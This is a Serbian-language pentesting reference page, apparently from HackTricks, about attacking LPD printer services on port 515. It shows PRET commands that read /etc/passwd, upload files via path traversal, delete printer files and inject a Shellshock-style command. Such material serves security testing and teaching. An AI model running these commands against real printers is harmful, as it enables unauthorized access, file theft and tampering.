515 - Pentesting Line Printer Daemon (LPD)

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Uvod u LPD protokol

U 1980-im godinama, razvijen je Line Printer Daemon (LPD) protokol u Berkeley Unix-u, koji je kasnije formalizovan kroz RFC1179. Ovaj protokol funkcioniše preko porta 515/tcp, omogućavajući interakciju putem lpr komande. Suština štampanja putem LPD-a uključuje slanje kontrolnog fajla (za specificiranje detalja posla i korisnika) zajedno sa podacima fajla (koji sadrži informacije za štampanje). Dok kontrolni fajl omogućava izbor različitih formata fajlova za podatke, rukovanje ovim fajlovima određeno je specifičnom implementacijom LPD-a. Široko priznata implementacija za Unix-slične sisteme je LPRng. Posebno, LPD protokol može biti iskorišćen za izvršavanje zlonamernih PostScript ili PJL print poslova.

Alati za interakciju sa LPD štampačima

PRET uvodi dva osnovna alata, lpdprint i lpdtest, koji pružaju jednostavan način za interakciju sa LPD-kompatibilnim štampačima. Ovi alati omogućavaju različite akcije, od štampanja podataka do manipulisanja fajlovima na štampaču, kao što su preuzimanje, otpremanje ili brisanje:

# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local

Za pojedince koji su zainteresovani za dalje istraživanje područja hakovanja štampača, sveobuhvatni resurs može se pronaći ovde: Hakovanje štampača.

Shodan

  • port 515

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Last updated